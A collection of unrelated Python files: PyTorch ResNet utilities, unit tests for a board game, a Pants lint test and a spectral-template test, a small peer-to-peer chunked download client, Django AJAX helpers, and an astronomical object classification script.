raise NotImplementedError(
'normalization layer [%s] is not found' % layer_type)
return norm_layer
def get_non_linearity(layer_type='relu'):
if layer_type == 'relu':
nl_layer = functools.partial(nn.ReLU, inplace=True)
elif layer_type == 'lrelu':
nl_layer = functools.partial(
nn.LeakyReLU, negative_slope=0.2, inplace=True)
elif layer_type == 'elu':
nl_layer = functools.partial(nn.ELU, inplace=True)
else:
raise NotImplementedError(
'nonlinearity activitation [%s] is not found' % layer_type)
return nl_layer
# 基本块
class BasicBlock(nn.Module):
def __init__(self, inplanes, outplanes, norm_layer=None, nl_layer=None, s=1):
super(BasicBlock, self).__init__()
layers = []
# self.maxPool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
if s == 1:
layers += [conv3x3(inplanes, inplanes)]
if norm_layer is not None:
layers += [norm_layer(inplanes)]
layers += [nl_layer()]
layers += [conv3x3(inplanes, outplanes)]
if norm_layer is not None:
layers += [norm_layer(outplanes)]
layers += [nl_layer()]
self.shortcut = nn.Conv2d(inplanes, outplanes, kernel_size=1, stride=1, padding=0)
elif s == 2:
layers += [conv3x3(inplanes, inplanes)]
if norm_layer is not None:
layers += [norm_layer(inplanes)]
layers += [nl_layer()]
layers += [conv3x3(inplanes, outplanes, stride=2)]
if norm_layer is not None:
layers += [norm_layer(outplanes)]
layers += [nl_layer()]
self.shortcut = nn.Conv2d(inplanes, outplanes, kernel_size=1, stride=2, padding=0)
else:
assert 0
self.conv = nn.Sequential(*layers)
def forward(self, x):
x0 = self.conv(x)
out = x0 + self.shortcut(x)
return out
class Resnet(nn.Module):
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(Resnet, self).__init__()
norm_layer = get_norm_layer(norm)
nl_layer = get_non_linearity(nl)
conv_layers = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)]
conv_layers += [norm_layer(ndf), nl_layer()]
conv_layers += [nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]
output_ndf = 0
for n in range(0, n_blocks):
input_ndf = ndf * (2 ** max(0, n - 1))
output_ndf = ndf * (2 ** n)
if n == 0:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=1)]
else:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=2)]
conv_layers += [nn.AdaptiveAvgPool2d((1, 1))]
self.conv = nn.Sequential(*conv_layers)
self.fc = nn.Linear(output_ndf, num_classes)
def forward(self, x):
x_conv = self.conv(x)
x_flat = torch.flatten(x_conv, 1)
out = self.fc(x_flat)
output = nn.Softmax()(out)
return output
class ExtractFirstLayer(nn.Module):
# 只定义到第一个卷积层
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(ExtractFirstLayer, self).__init__()
self.conv1 = nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)
def forward(self, x):
x_conv1 = self.conv1(x)
return x_conv1
class ExtractLastLayer(nn.Module):
"""
定义到最后一个卷积层 输出feature map
"""
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(ExtractLastLayer, self).__init__()
norm_layer = get_norm_layer(norm)
nl_layer = get_non_linearity(nl)
conv_layers = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)]
conv_layers += [norm_layer(ndf), nl_layer()]
conv_layers += [nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]
max_pool = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False),
norm_layer(ndf), nl_layer(),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1,
return_indices=True)]
self.max_pool = nn.Sequential(*max_pool)
for n in range(0, n_blocks):
input_ndf = ndf * (2 ** max(0, n - 1))
output_ndf = ndf * (2 ** n)
if n == 0:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=1)]
else:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=2)]
self.conv = nn.Sequential(*conv_layers)
def forward(self, x):
x_conv = self.conv(x)
_, indices = self.max_pool(x)
return x_conv, indices
def init_net(net, init_type='normal', gpu_ids=[0], gain=0.02):
if len(gpu_ids) > 0:
assert (torch.cuda.is_available())
device = torch.device('cuda:0')
net.to(device)
def init_func(m):
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or
classname.find('Linear') != -1):
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
init.normal_(m.weight.data, 1.0, gain)
init.constant_(m.bias.data, 0.0)
print('initialize network with %s' % init_type)
net.apply(init_func)
return net
def get_scheduler(optimizer, opt):
if opt.lr_policy == 'lambda':
def lambda_rule(epoch):
lr_l = 1.0 - max(0, epoch - opt.niter) / float(opt.niter_decay + 1)
return lr_l
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)
elif opt.lr_policy == 'step':
scheduler = lr_scheduler.StepLR(
optimizer, step_size=opt.lr_decay_iters, gamma=0.1)
elif opt.lr_policy == 'plateau':
scheduler = lr_scheduler.ReduceLROnPlateau(
optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)
else:
return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)
return scheduler
|
'''
Created on 7 feb. 2014
@author: Pieter
'''
import unittest
from dungeonz.CageBoard import CageBoard
from dungeonz.Cage import Cage, Upgrade
from dungeonz.Petz import Pet
class Test(unittest.TestCase):
def setUp(self):
self.cb1 = CageBoard(1)
self.cb2 = CageBoard(2)
self.cb3 = CageBoard(3)
self.cb4 = CageBoard(4)
self.tc1 = Cage("cage_1.png",strength=2,magic=1)
self.tc2 = Cage("cage_6.png",magic=3)
self.tu=Upgrade("upgrade_1.png", "strength")
self.tp=Pet("1",eating="veg",sell_value={4:2,5:3,6:4,7:5})
def tearDown(self):
del(self.cb1)
del(self.cb2)
del(self.cb3)
del(self.cb4)
del(self.tc1)
del(self.tc2)
del(self.tu)
del(self.tp)
def testConstructor(self):
self.assertIsInstance(self.cb1, CageBoard)
self.assertIsInstance(self.cb1.cages, list)
self.assertIsInstance(self.cb1.cages[0], Cage)
self.assertEqual(self.cb1.cages[1], None)
self.assertEqual(self.cb1.cages[2], None)
self.assertEqual(self.cb1.cages[3], None)
self.assertIsInstance(self.cb1.cage_upgrades, list)
self.assertEqual(self.cb1.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb1.petz, list)
self.assertEqual(self.cb1.petz, [None,None,None,None])
self.assertIsInstance(self.cb1.free, list)
self.assertEqual(self.cb1.free, [1,1,1,1])
self.assertEqual(self.cb1.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb2, CageBoard)
self.assertIsInstance(self.cb2.cages, list)
self.assertIsInstance(self.cb2.cages[0], Cage)
self.assertEqual(self.cb2.cages[1], None)
self.assertEqual(self.cb2.cages[2], None)
self.assertEqual(self.cb2.cages[3], None)
self.assertIsInstance(self.cb2.cage_upgrades, list)
self.assertEqual(self.cb2.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb2.petz, list)
self.assertEqual(self.cb2.petz, [None,None,None,None])
self.assertIsInstance(self.cb2.free, list)
self.assertEqual(self.cb2.free, [1,1,1,1])
self.assertEqual(self.cb2.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb3, CageBoard)
self.assertIsInstance(self.cb3.cages, list)
self.assertIsInstance(self.cb3.cages[0], Cage)
self.assertEqual(self.cb3.cages[1], None)
self.assertEqual(self.cb3.cages[2], None)
self.assertEqual(self.cb3.cages[3], None)
self.assertIsInstance(self.cb3.cage_upgrades, list)
self.assertEqual(self.cb3.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb3.petz, list)
self.assertEqual(self.cb3.petz, [None,None,None,None])
self.assertIsInstance(self.cb3.free, list)
self.assertEqual(self.cb3.free, [1,1,1,1])
self.assertEqual(self.cb3.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb4, CageBoard)
self.assertIsInstance(self.cb4.cages, list)
self.assertIsInstance(self.cb4.cages[0], Cage)
self.assertEqual(self.cb4.cages[1], None)
self.assertEqual(self.cb4.cages[2], None)
self.assertEqual(self.cb4.cages[3], None)
self.assertIsInstance(self.cb4.cage_upgrades, list)
self.assertEqual(self.cb4.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb4.petz, list)
self.assertEqual(self.cb4.petz, [None,None,None,None])
self.assertIsInstance(self.cb4.free, list)
self.assertEqual(self.cb4.free, [1,1,1,1])
self.assertEqual(self.cb4.cages[0].getAttributes()['poo'], 1)
def testAddCage(self):
self.assertIsInstance(self.cb1.cages[0], Cage)
self.assertEqual(self.cb1.free, [True for x in range(4)]) # @UnusedVariable
self.assertFalse(self.cb1.addCage(1, " tralala"))
self.assertFalse(self.cb1.addCage(6, self.tc1))
self.assertTrue(self.cb1.addCage(1, self.tc1))
self.assertEqual(self.cb1.free, [False,True,True,True])
self.assertEqual(self.cb1.cages[0], self.tc1)
self.assertFalse(self.cb1.addCage(1, self.tc2))
self.assertEqual(self.cb1.cages[0], self.tc1)
def testGetAttributes(self):
self.assertIsInstance(self.cb1.getAttributes(),dict)
aa=self.cb1.getAttributes()
self.assertIsInstance(aa['cages'], list)
self.assertIsInstance(aa['cage_upgrades'], list)
self.assertIsInstance(aa['petz'], list)
self.assertIsInstance(aa['free'], list)
self.assertEqual(len(aa['cages']), 4)
self.assertEqual(len(aa['cage_upgrades']), 4)
self.assertEqual(len(aa['petz']), 4)
self.assertEqual(len(aa['free']), 4)
self.assertFalse(self.cb1.getAttributes(5))
self.assertIsInstance(self.cb1.getAttributes(3),dict)
self.cb1.addCage(2, self.tc1)
self.cb1.cage_upgrades[1] = self.tu
self.cb1.petz[1] = self.tp
s2= self.cb1.getAttributes(2)
self.assertEqual(s2['cage'], self.tc1)
self.assertEqual(s2['cage_upgrade'], self.tu)
self.assertEqual(s2['pet'], self.tp)
self.assertFalse(s2['free'])
def testAddPetToCage(self):
self.cb1.addCage(2, self.tc1)
self.assertEqual(self.cb1.getAttributes(2)['pet'], None)
self.assertFalse(self.cb1.addPetToCage(5, self.tp))
self.assertFalse(self.cb1.addPetToCage(4, self.tp))
self.assertTrue(self.cb1.addPetToCage(2, self.tp))
self.assertFalse(self.cb1.addPetToCage(3, "tralala"))
self.assertEqual(self.cb1.getAttributes(2)['pet'], self.tp)
self.assertEqual(self.tp.getCage(), self.tc1)
self.assertFalse(self.cb1.addPetToCage(2, self.tp))
def testAddUpgrade(self):
self.assertEqual(self.tc1.strength, 2)
self.assertFalse(self.cb1.addUpgrade(5, self.tu))
self.assertFalse(self.cb1.addUpgrade(1, "trat"))
self.assertFalse(self.cb1.addUpgrade(3, self.tu))
self.assertTrue(self.cb1.addCage(2, self.tc1))
self.assertTrue(self.cb1.addUpgrade(2, self.tu))
self.assertEqual(self.tc1.strength, 3)
self.assertFalse(self.cb1.addUpgrade(2, self.tu))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
import socket, os
import time
import download_dhaga
#To get ip of current node
x=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
try:
x.connect(("gmail.com",80))
myip=x.getsockname()[0]
except:
print "Client not connected to internet !!!!!"
return
#UDP part
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientSocket.bind((myip,50008))
msg,serveraddr=clientSocket.recvfrom(2048)
serverip=serveraddr[0]
msg,totno=msg.split('#') #totno represents total no of nodes on network
print msg
totno=int(totno)
res=raw_input("Enter Yes/No\n")
clientSocket.sendto(res,serveraddr)
clientSocket.close()
if(res == "Yes"):
#To set client address and port
#serveraddr=(myip,50005) #myip to be replace with server addr
time.sleep(9*totno)
print "Client on TCP"
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((serverip,50005))
ext=clientSocket.recv(1024)
msg=clientSocket.recv(1024)
#print msg
rurl,st,en,i=msg.split()
start=int(st)
end=int(en)
ind=int(i)
download_dhaga.download(rurl,start,end,ext)
f=open('final'+ext,'rb')
l=f.read(1024)
while l:
clientSocket.send(l)
l=f.read(1024)
os.remove('final'+ext)
clientSocket.close()
|
from datetime import time
from time import sleep
from GUI import *
import Main
from tkinter import messagebox
runGUI()
while (True):
hour = datetime.now().hour
min = datetime.now().minute
day = datetime.now().weekday()
if len(Main.toDoList[day]) == 0:
sleep((24 - hour)*60*60 +(60 - min)*60)
else :
works_list = Main.toDoList[day]
for i in range(len(works_list)):
work = works_list[i]
if time(hour, min) > work.getTime():
continue
else:
t = datetime.now().time()
while not(t.hour == work.getTime().hour and t.minute == work.getTime().minute):
sleep(30)
t = datetime.now().time()
mess = work.toString() + (' -> Mother' if Main.mark[day][i] else ' -> Father')
notice(mess)
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.visibility.lint import EnforceVisibilityRules, VisibilityFieldSet
from pants.backend.visibility.lint import rules as lint_rules
from pants.backend.visibility.rules import rules as visibility_rules
from pants.core.goals.lint import Lint, LintResult
from pants.core.target_types import GenericTarget
from pants.core.util_rules.partitions import _EmptyMetadata
from pants.engine.addresses import Address
from pants.engine.target import Target
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*lint_rules(),
*visibility_rules(),
QueryRule(LintResult, (EnforceVisibilityRules.Batch,)),
],
target_types=[GenericTarget],
)
rule_runner.write_files(
{
"BUILD": dedent(
"""\
__dependencies_rules__(
# No dependencies at all allowed
("*", "!*"),
)
target(name="root")
target(name="leaf", dependencies=["//:root"])
"""
),
}
)
return rule_runner
def run_lint(
rule_runner: RuleRunner,
targets: list[Target],
*,
extra_args: list[str] | None = None,
) -> LintResult:
rule_runner.set_options(
["--backend-packages=pants.backend.experimental.visibilty", *(extra_args or ())],
)
field_sets = [VisibilityFieldSet.create(tgt) for tgt in targets]
with rule_runner.scheduler._goals._execute(Lint):
lint_result = rule_runner.request(
LintResult,
[
EnforceVisibilityRules.Batch(
"",
tuple(field_sets),
partition_metadata=_EmptyMetadata(),
),
],
)
return lint_result
def test_lint_success(rule_runner: RuleRunner) -> None:
tgt = rule_runner.get_target(Address("", target_name="root"))
lint_result = run_lint(
rule_runner,
[tgt],
)
assert lint_result.exit_code == 0
assert lint_result.stderr == ""
assert lint_result.stdout == ""
def test_lint_failure(rule_runner: RuleRunner) -> None:
tgt = rule_runner.get_target(Address("", target_name="leaf"))
lint_result = run_lint(
rule_runner,
[tgt],
)
assert lint_result.exit_code == 1
assert lint_result.stderr == ""
assert (
lint_result.stdout
== dedent(
"""\
//:leaf has 1 dependency violation:
* BUILD[!*] -> : DENY
target //:leaf -> target //:root
"""
).strip()
)
|
"""Utility functions to handle the backpropagation."""
def no_op(*args, **kwargs):
"""Placeholder function that accepts arbitrary input and does nothing."""
return None
|
import json
from django.http import HttpResponse
def ajax_error( etype='DefaultError', description='Internal server error',
additional_data={} ):
msg = {
'reason': etype,
'data': description
}
msg.update( additional_data )
return HttpResponse(
json.dumps({
'status' : 'fail',
'msg': msg
})
)
def ajax_confirm( data={} ):
return HttpResponse(
json.dumps({
'status' : 'ok',
'msg': data
})
)
|
def remove(text, what):
str = ''
for x in text:
if x in what and what[x]>0:
what[x] -= 1
else:
str += x
return str
'''
Write
remove(text, what)
that takes in a string str(text in Python) and an object/hash/dict/Dictionary
what and returns a string with the chars removed in what. For example:
remove('this is a string',{'t':1, 'i':2}) == 'hs s a string'
# remove from 'this is a string' the first 1 't' and the first 2 i's.
remove('hello world',{'x':5, 'i':2}) == 'hello world'
# there are no x's or i's, so nothing gets removed
remove('apples and bananas',{'a':50, 'n':1}) == 'pples d bnns'
# we don't have 50 a's, so just remove it till we hit end of string.
'''
|
"""
Small module containing functionality to make predict for сlassification of objects into stars, quasars and galaxy
"""
import argparse
import json
import joblib
import functools
import glob
import importlib
import os
import multiprocessing
import pickle
import re
import shutil
#import subprocess
import sys
import time
from collections import defaultdict
import astropy.table
import numpy as np
import pandas as pd
import tqdm
import warnings
def _import_user_defined_features_transformation(
path_to_code: str,
transformation_name: str):
path, module_name = os.path.split(os.path.splitext(path_to_code)[0])
sys.path.append(path)
user_module = importlib.import_module(module_name)
return getattr(user_module, transformation_name)
def _columns_intersection(df1: pd.DataFrame, df2: pd.DataFrame):
result = list()
for col in df1.columns:
if col in df2.columns:
result.append(col)
return result
def format_message(msg):
return f'===== {msg} ====='
def file_exists(path):
return os.path.isfile(path) and os.stat(path).st_size > 0
def parse_cli_args():
def check_args(args):
return True
def _add_default_and_type(desc: str, arg_type=None, default_value=None,
isflag=False):
"""
Helper function to form an argument description for argparse
:param desc: helper description
:param arg_type: argument type to insert to argument description
:param default_value: default value of arg_type to insert to argument description
:param isflag: if True, then adds info that the argument is a flag
:return: argument description with type and default value information if such provided
"""
assert arg_type is None or callable(arg_type)
assert default_value is None or isinstance(default_value, arg_type)
if isflag:
default_value_msg = ''
arg_type_msg = 'flag'
else:
arg_type_msg = ''
if arg_type is not None:
arg_type_msg = f'type: {type(arg_type()).__name__}'
default_value_msg = ''
if default_value is not None:
if arg_type == str:
default_value_msg = f'default: "{default_value}"'
else:
default_value_msg = f'default: {default_value}'
if default_value_msg and arg_type_msg:
return f'[{arg_type_msg}; {default_value_msg}] {desc}'
if arg_type_msg:
return f'[{arg_type_msg}] {desc}'
if default_value_msg:
return f'[{default_value_msg}] {desc}'
return desc
description = "Script to make сlassification of objects into stars, quasars and galaxy for objects with photometric data."\
"\n" \
"\n List of models" \
"\n " \
"\n - gb - Gradient boosting models" \
"\n - tn - TabNet models" \
"\n - gb_big - Gradient boosting models trained on a large dataset" \
"\n - tn_big - TabNet models trained on a large dataset" \
"\n - 18 - SDSS + WISE" \
"\n - 19 - PanSTARRS + WISE" \
"\n - 20 - SDSS + DESI LIS + WISE" \
"\n - 21 - PanSTARRS + DESI LIS + WISE" \
"\n - 22 - DESI LIS + WISE" \
"\n - 34 - SDSS + PanSTARRS + WISE" \
"\n - 35 - SDSS + PanSTARRS + DESI LIS + WISE"
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=description)
argument_description = "Path to input file."
arg_type = str
default_value = './x-ray_data.gz_pkl'
parser.add_argument('--inputFile', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Path to dir with features files to make predictions on."
arg_type = str
default_value = None
parser.add_argument('--predictOn', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Format of output file."
arg_type = str
default_value = 'gz_pkl'
parser.add_argument('--outputExt', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
# other arguments
argument_description = "Path to output directory."
arg_type = str
default_value = None
parser.add_argument('-o', '--outputDir', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Models series to apply. Possible values are 'gb', 'tn'."
arg_type = str
default_value = "gb"
parser.add_argument('--modelsSeries', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Specify list of models' ids to apply. If not specified, then will apply default" \
" set of models for specified series. See list of models above."
arg_type = int
default_value = None
parser.add_argument('--modelsIds', type=arg_type, default=default_value,
nargs='+',
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "If used then all models will be loaded into memory at once"
parser.add_argument('--keepModelsInMemory', action='store_true',
help=_add_default_and_type(argument_description,
isflag=True))
argument_description = "Predictions chunk size. Ignored if --predictOn"
arg_type = int
default_value = 100000
parser.add_argument('--chunkSize', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Number of jobs for parallelism"
arg_type = int
default_value = 1
parser.add_argument('--njobs', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
return parser.parse_args()
def _drop_multidims(table: astropy.table.Table):
"""
drop multidimentional columns from astropy.Table so it can be converted to pandas.DataFrame
"""
singledim_cols = list()
multidim_cols = list()
for col in table.colnames:
if len(table[col].shape) == 1:
singledim_cols.append(col)
else:
multidim_cols.append(col)
return table[singledim_cols], multidim_cols
def read_table(table):
if isinstance(table, str):
_, ext = os.path.splitext(table)
if ext == '.gz_pkl':
try:
return pd.read_pickle(table, compression='gzip')
except:
return pd.read_pickle(table)
if ext == '.pkl':
return pd.read_pickle(table)
if ext == '.fits':
table = astropy.table.Table.read(table)
if isinstance(table, pd.DataFrame):
return table
if isinstance(table, astropy.table.Table):
table, dropped_cols = _drop_multidims(table)
if dropped_cols:
warnings.warn(
"multidimentional columns are dropped from table : {}".format(
dropped_cols))
return table.to_pandas()
raise Exception('Unsupported format of table')
def write_table(table, df):
if not isinstance(df, pd.DataFrame):
raise Exception('DataFrame is not pandas')
if isinstance(table, str):
_, ext = os.path.splitext(table)
if ext == '.gz_pkl':
df.to_pickle(table, compression='gzip', protocol=4)
return
if ext == '.pkl':
df.to_pickle(table)
return
if ext == '.fits':
#print(df.fillna(-9999).dtypes)
df['index'] = df.index.copy()
df = astropy.table.Table.from_pandas(df.fillna(-9999))#.dropna()
'''
df, dropped_cols = _drop_multidims(df)
if dropped_cols:
warnings.warn(
"multidimentional columns are dropped from table : {}".format(
dropped_cols))
'''
df.write(table, overwrite=True, format='fits')
return
raise Exception('Unsupported format of table')
def _load_obj(*args):
return joblib.load(os.path.join(*args))
def pred(data, feats, model, mid, robust=None):
X = data[feats].values
if robust is not None:
X = robust.transform(X)
y_t = model.predict(X)
y_p = model.predict_proba(X)
p = pd.DataFrame({
#index: data[index],
f'ProbabilityS{mid}': y_p[:, 0],
f'ProbabilityQ{mid}': y_p[:, 1],
f'ProbabilityG{mid}': y_p[:, 2],
f'Label{mid}': y_t
}, index=data['__tempid__'])
#p.index('__tempid__')
return p
def predict(datasets_files, models_path, models: dict, njobs=1,
output_path='./', keep_in_memory=False):#, index='nrow'):
models_data = defaultdict(dict)
models_iterable = tqdm.tqdm(models.items(),
desc="Load models") if keep_in_memory else models.items()
for mid, model in models_iterable:
clf_path = os.path.join(models_path, f'model_{model}.pkl')
features_path = os.path.join(models_path, f'features_{model}.pkl')
models_data[mid]['clf'] = _load_obj(
clf_path) if keep_in_memory else clf_path
models_data[mid]['feats'] = _load_obj(
features_path) if keep_in_memory else features_path
if mid[:2]=='gb':
robust_path = os.path.join(models_path, f'{model}_robust_for_gb.pkl')
models_data[mid]['robust'] = _load_obj(
robust_path) if keep_in_memory else robust_path
for ds_path in tqdm.tqdm(datasets_files, desc="Predictions"):
fname, ext = os.path.splitext(ds_path)
fname = os.path.splitext(fname)[0]#.split('/')[-1]
test_data = read_table(os.path.join(ds_path))
#need_to_predict = index in test_data.columns
#if not need_to_predict:
# continue
test_data['__tempid__'] = test_data.index.copy()
#############можно разбить на потоки
for mid, model_data in tqdm.tqdm(models_data.items()):
preds_dst_file = f'{fname}.preds.{mid}{ext}'#############################################
if not file_exists(preds_dst_file):
if keep_in_memory:
feats = model_data['feats']
else:
feats = _load_obj(model_data['feats'])
notna_mask = test_data[feats].notna().all(axis=1)
if not notna_mask.any():
continue
test_data_notna = test_data.loc[notna_mask]
if keep_in_memory:
clf = model_data['clf']
else:
clf = _load_obj(model_data['clf'])
res = pd.DataFrame()
if mid[:2]=='gb':
if keep_in_memory:
robust = model_data['robust']
else:
robust = _load_obj(model_data['robust'])
res = pred(test_data_notna, feats, clf, mid, robust)
else:
res = pred(test_data_notna, feats, clf, mid)
if not keep_in_memory:
del clf
res.to_pickle(preds_dst_file, compression='gzip', protocol=4)
def split_data(data=None, chunksize=100000):
for istart in range(0, len(data), chunksize):
iend = min(istart + chunksize, len(data) + 1)
result = data.iloc[istart:iend]
yield result
def assemble_results(buf_path: str, dst_path: str, models_series, format_save: str):
start_nrow = 0
for file in sorted(glob.glob(os.path.join(buf_path, '*.features.gz_pkl'))):
# shutil.copy(file, dst_path)
fname = re.findall(r'(.*)\.features\.gz_pkl$', os.path.basename(file))[0]
preds_dst_file = os.path.join(dst_path,
f'{fname}.predictions.{models_series}.{format_save}')
preds = []
for preds_file in glob.glob(
os.path.join(buf_path, f'{fname}.p*.{models_series}*')):
#print(preds_file)
preds.append(pd.read_pickle(preds_file, compression='gzip'))
try:
data = pd.concat(preds, axis=1)
except ValueError as ve:
if str(ve) == 'No objects to concatenate':
continue
else:
raise ValueError(ve)
write_table(preds_dst_file, data)
def main():
data_path = './'
models_path = os.path.join(data_path, 'models')
models_series = {
"gb": {
"path": os.path.join(models_path, 'gb'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"tn": {
"path": os.path.join(models_path, 'tn'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"gb_big": {
"path": os.path.join(models_path, 'gb'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
},
"tn_big": {
"path": os.path.join(models_path, 'tn'),
"models": {
"18": "sdssdr16+wise_decals8tr",
"19": "psdr2+wise_decals8tr",
"20": "sdssdr16+all_decals8tr",
"21": "psdr2+all_decals8tr",
"22": "decals8tr",
"34": "sdssdr16+psdr2+wise_decals8tr",
"35": "sdssdr16+psdr2+all_decals8tr"
}
}
}
files2predict = []
args = parse_cli_args()
#print('OOON', args.predictOn)
if args.inputFile is None :
inputFile = './x-ray_data.gz_pkl'
else:
inputFile = args.inputFile
if args.outputDir is None :
outputDir = './'
else:
outputDir = args.outputDir
if args.predictOn is None:
files2predict = []
input_data_file = read_table(inputFile)
data_path = os.path.join(outputDir, 'data')
#print('dataaaaaaaaaaaa', data_path)
data_written_file = os.path.join(data_path, "DATA_WRITTEN_FILE.txt")
if not os.path.isfile(data_written_file):
os.makedirs(data_path, exist_ok=True)
iterator = list(split_data(data = input_data_file,
chunksize=args.chunkSize))
for i, chunk in tqdm.tqdm(enumerate(iterator), total=len(iterator),
desc='Preparing data'):
fname = 'part-{:05d}'.format(i)
chunk_dst_path = os.path.join(data_path,
f'{fname}.features.gz_pkl')
chunk.to_pickle(chunk_dst_path, compression='gzip',
protocol=4)
predictOn = data_path
else:
predictOn = args.predictOn
buf_path = os.path.join(outputDir, 'buf')
os.makedirs(buf_path, exist_ok=True)
for file in glob.glob(os.path.join(predictOn, '*.features.gz_pkl')):
shutil.copy(file, buf_path)
files2predict.append(os.path.join(buf_path, os.path.basename(file)))
if args.modelsIds is not None:
#print(models_series[args.modelsSeries])
models_path = models_series[args.modelsSeries]['path']
models = {f'{args.modelsSeries}{mid}': model for mid, model in
models_series[args.modelsSeries]['models'].items()
if int(mid) in args.modelsIds}
files2predict = sorted(files2predict)
#print(files2predict, models_path, models)
predict(files2predict, models_path, models,
keep_in_memory=args.keepModelsInMemory,
njobs=args.njobs)
assemble_results(buf_path, args.outputDir,
models_series=args.modelsSeries,
format_save=args.outputExt if args.outputExt is not None else 'gz_pkl')
# if args.cleanupBuffer:
# shutil.rmtree(buf_path)
if __name__ == '__main__':
main()
|
print('123')
print('1234g')
print('12341234')
|
import pytest
import os
import numpy as np
from .. import utils
from .. import templates
def test_data_path():
"""
Data path
"""
path = os.path.join(os.path.dirname(__file__), '../data/')
assert(os.path.exists(path))
return path
def test_templates_path():
"""
Does ``templates`` path exist?
"""
path = test_data_path()
assert(os.path.exists(os.path.join(path, 'templates')))
return os.path.join(path, 'templates')
def test_read_template_ascii():
"""
Test interpolation function
"""
path = test_templates_path()
ascii_file = os.path.join(path, 'fsps_full/fsps_QSF_12_v3_001.dat')
templ = templates.Template(file=ascii_file)
assert(templ.name == 'fsps_QSF_12_v3_001.dat')
assert(np.allclose(templ.flux.shape, [1,5994]))
return templ
def test_read_template_fits():
"""
Read template FITS file
"""
path = test_templates_path()
fits_file = os.path.join(path,
'spline_templates_v2/spline_age0.01_av0.0.fits')
templ = templates.Template(file=fits_file)
assert(np.allclose(templ.flux.shape, [templ.NZ, 12603]))
assert(templ.name == 'spline_age0.01_av0.0.fits')
return templ
def test_gaussian_templates():
"""
Test templates.gaussian_templates
"""
wave = np.arange(5000., 6000.)
centers = np.arange(5100.,5901.,100)
width = 10
widths = centers*0+width
NW = len(wave)
NG = len(centers)
norm = np.sqrt(2*np.pi*width**2)
n0 = templates.gaussian_templates(wave, centers=centers, widths=widths,
norm=False)
assert(np.allclose(n0.shape, (NW, NG)))
assert(np.allclose(n0.max(), 1., rtol=1.e-4))
assert(np.allclose(n0.sum(), norm*NG, rtol=1.e-4))
# Normalized
